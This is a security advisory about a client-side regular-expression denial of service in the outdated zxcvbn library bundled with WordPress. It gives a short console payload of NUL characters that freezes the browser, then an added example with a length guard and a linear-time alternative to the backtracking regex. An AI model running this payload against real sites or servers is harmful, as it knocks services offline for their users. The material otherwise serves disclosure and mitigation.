Client-Side ReDOS
WordPress ships with an End-Of-Life version of the zxcvbn password-strength library that suffers from a Client-Side ReDOS (Regular Expression Denial Of Service). Passing the crafted string below to zxcvbn() ties up the page's JavaScript thread, so the tab stops responding and the browser is effectively crashed. If the same library is used Server-Side (for example in Node.js) and attacker-controlled input reaches it, the same string would block the server's event loop and could potentially crash the whole web server. So far, I've only been able to exploit this Client-Side.
Exploit
- Navigate to the following URL:
https://example.com/wp-login.php
- Open the browser's built-in developer console (the zxcvbn() global is available on this page) and issue the following two commands:
attackStr = '\x00\x00' + ('\x00'.repeat(54773)) + '\n';
zxcvbn(attackStr);
- Note that the tab stops responding and the web browser becomes completely unusable
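The following is an added example, not code from this advisory or from zxcvbn. It builds the advisory's payload, puts a length guard in front of a strength scorer so untrusted input never reaches it unbounded (the same guard applies to a Node.js server that scores passwords), and contrasts a backtracking backreference regex with a linear-time repeat finder to show the behaviour behind a ReDOS. The 100-character cap, the guardedScore wrapper and the regexes are my assumptions; the advisory does not name the pattern inside zxcvbn, and these are not its internals.

```javascript
// Added example: length guard for a password-strength scorer, plus an
// illustration of the backtracking behaviour behind ReDOS. Not code from the
// advisory or from zxcvbn; the cap, the wrapper and the regexes are assumptions.

// The advisory's payload: two NULs, a run of `n` NULs, and a trailing newline.
function attackString(n = 54773) {
  return '\x00\x00' + '\x00'.repeat(n) + '\n';
}

// Assumption: 100 characters is a cap chosen here, not a zxcvbn setting. A scorer
// gains little from characters past that point, and bounding the input bounds the
// estimator's worst case on both the client and a Node.js server.
const MAX_SCORED_LENGTH = 100;

// Wrap any scorer (zxcvbn or otherwise) so untrusted input is cut before scoring.
function guardedScore(password, scorer, maxLen = MAX_SCORED_LENGTH) {
  if (typeof password !== 'string') throw new TypeError('password must be a string');
  const truncated = password.length > maxLen;
  const input = truncated ? password.slice(0, maxLen) : password;
  return { truncated, scoredLength: input.length, result: scorer(input) };
}

// Illustrative backreference regex (not the pattern zxcvbn uses). Backreferences
// force backtracking: on input like 'aaaa...ab' this form retries every candidate
// unit length and every repeat count before failing, so cost grows superlinearly.
function findRepeatRegex(s) {
  const m = /^(.+?)\1+$/.exec(s);
  return m ? { unit: m[1], count: s.length / m[1].length } : null;
}

// Linear-time replacement: the smallest period of a string is n - pi[n-1], where
// pi is the KMP failure function. No backtracking, so the cost is O(n) on any input.
function findRepeatLinear(s) {
  const n = s.length;
  if (n < 2) return null;
  const pi = new Int32Array(n);
  for (let i = 1, k = 0; i < n; i++) {
    while (k > 0 && s[i] !== s[k]) k = pi[k - 1];
    if (s[i] === s[k]) k++;
    pi[i] = k;
  }
  const p = n - pi[n - 1];
  if (p === n || n % p !== 0) return null;
  return { unit: s.slice(0, p), count: n / p };
}

// Time the greedy form of the backreference pattern on a growing run of NULs, the
// shape of the advisory's payload. The engine backtracks once per candidate group
// length and re-compares the group each time, so doubling n roughly quadruples
// the time; a length cap is what keeps this bounded.
function backtrackGrowth(sizes = [2000, 4000, 8000, 16000]) {
  return sizes.map((n) => {
    const s = '\x00'.repeat(n);
    const t0 = performance.now();
    /(.+)\1+/.exec(s);
    return { n, ms: performance.now() - t0 };
  });
}

// Stand-alone demo: the guard stops the 54,776-byte payload at 100 characters,
// and the timing table shows the superlinear growth of the backtracking regex.
const guarded = guardedScore(attackString(), (s) => s.length);
console.log('scored length:', guarded.scoredLength, 'truncated:', guarded.truncated);
for (const row of backtrackGrowth()) console.log(`n=${row.n}\t${row.ms.toFixed(1)} ms`);
```

Truncating rather than rejecting keeps the strength meter working for long passphrases while capping the work an attacker can force; on a server the same wrapper is what stops one request from stalling the event loop. The two repeat finders return the same result on ordinary input, which is the point: the backtracking version buys nothing except the worst case.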